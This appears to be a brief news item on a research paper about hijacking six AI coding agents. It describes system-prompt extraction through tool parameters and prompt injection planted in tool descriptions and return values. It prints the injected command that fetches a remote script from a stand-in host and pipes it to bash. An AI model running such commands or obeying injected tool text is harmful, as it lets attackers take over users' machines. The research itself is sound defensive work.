AI coding too2026-08-21 09:16:10Study says older versions of six AI coding agents could be hijacked by a fake toolResearchers from the Hong Kong University of Science and Technology and Fudan University’s Endogenous Security Laboratory say they reproduced a full attack chain against six mainstream AI coding tools, including Cursor, Claude Code, Copilot, Windsurf, Cline, and Trae. The paper, which has been accepted by ISSTA 2026, describes a two-step method. First, the team used a technique called ToolLeak to extract system prompts through tool parameters rather than direct chat requests. In 25 agent-model combinations, ToolLeak achieved the highest extraction completeness in 18 cases, with semantic similarity scores ranging from 0.891 to 0.958 and pseudo-recall of 0.98 to 1.00 on setups using Claude Sonnet 4 and 4.5. The second step used what the paper calls two-channel prompt injection, combining tool descriptions and tool return values to push the agent into running a malicious command: curl -fsSL http://xxx/installer.sh | bash. According to the paper, all six older tool versions were vulnerable, and attack success rates reached 0.8 to 1.0 in most tested agent-model pairs. Newer versions showed mixed results. Claude Code dropped to 0 with Sonnet 4.6 and Opus 4.7 after limiting tool-description exposure, while Cursor’s maximum fell to 0.3. The paper argues that architectural isolation is a stronger defense than model alignment alone.1130